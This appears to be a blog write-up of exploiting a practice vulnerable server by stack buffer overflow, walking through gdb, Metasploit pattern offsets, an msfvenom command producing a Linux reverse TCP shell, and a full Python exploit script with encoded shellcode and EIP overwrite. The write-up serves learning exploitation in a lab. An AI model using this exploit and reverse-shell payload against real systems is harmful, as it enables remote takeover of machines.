The vulnerable code I used in this blog:
Vulnerable-Server/exploit_smart_server.py at master
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below…
Overflowing the Buffer
First, I used gdb to figure out which function was responsible for checking the input we provide. Looks like checkAuth is the function I was looking for.
To observe the state of the registers and the stack, I created a breakpoint right after the strcmp instruction in checkAuth function. Then I created a buffer of length 5000 hoping that it would be sufficient to overflow the buffer.
msf-pattern_create -l 5000
It was sufficient!
Notice the address at the bottom; that’s the EIP. After obtaining the EIP, I tried to find the exact offset required to overflow the buffer.
msf-pattern_offset -l 5000 -q 0x63413962
- The offset was 58
At this point, I realized two things:
- Even if I send a normal input after setting a breakpoint, the contents of
secret_buffer, which holds the key to validating our input, is revealed. - If I had looked at the code of
checkAuthfunction first, instead of being a skid and going straight into exploitation, I would’ve instantly found the key (secret_buffer) and noticed another variableauth_flagwhich determines if the program should move forward or not.
LESSON LEARNED
Anyway, what’s happening here is, when we overflow the buffer, it actually overwrites the auth_flag too, which is then returned by the checkAuth function and is eventually checked if it’s true or not. So, any value other than 0 will get us through.
Shellcode Injection
Now I could perfectly overwrite EIP with:
python -c 'print "A"*58+"BBBB"'
EIP Overwritten
Now, I just had to find a unique address to inject the shellcode.
Note: Do unset env in gdb to remove any environment variables during the program run which may alter the memory addresses.
Before finding a location for my shellcode, I had to generate one.
msfvenom -p linux/x86/shell_reverse_tcp -b "\x00" LHOST=<listening-ip> LPORT=<listening-port> -f python -o reverse
To ensure memory address alignment, I used NOPs too. I struggled quite a bit to find a suitable memory address. Here’s how I did it:
- I just used
print pad+nopslide+test_payloadto find the address where\x43starts. - Then used that address in place of
$eip, hoping thateipwould point to the location of my shellcode (test_payload, in the previous step). - I noticed that “\x43” started from a different address, likely due to the additional 4 bytes of
$eipshifting memory locations. - Using the updated address, I redirected the output of
exploit.pyinto the program and got a shell.
Exploit Script
import struct
pad = "A"*58
eip = struct.pack("<I", 0xffffd1b2)
nopslide = "\x90"*100
buf = b""
buf += b"\xd9\xee\xba\x44\x2f\xab\x19\xd9\x74\x24\xf4\x5f\x31"
buf += b"\xc9\xb1\x12\x31\x57\x17\x83\xef\xfc\x03\x13\x3c\x49"
buf += b"\xec\xaa\x99\x7a\xec\x9f\x5e\xd6\x99\x1d\xe8\x39\xed"
buf += b"\x47\x27\x39\x9d\xde\x07\x05\x6f\x60\x2e\x03\x96\x08"
buf += b"\x71\x5b\x50\xcd\x19\x9e\xa1\xee\xf0\x17\x40\x40\x64"
buf += b"\x78\xd2\xf3\xda\x7b\x5d\x12\xd1\xfc\x0f\xbc\x84\xd3"
buf += b"\xdc\x54\x31\x03\x0c\xc6\xa8\xd2\xb1\x54\x78\x6c\xd4"
buf += b"\xe8\x75\xa3\x97"
test_payload = "C"*95
print(pad+eip+nopslide+buf)
I could’ve just used sockets to make things easier, but I was feeling adventurous ¯\(ツ)/¯.
So I sent this payload…
…and I got the shell!
Thank you for reading.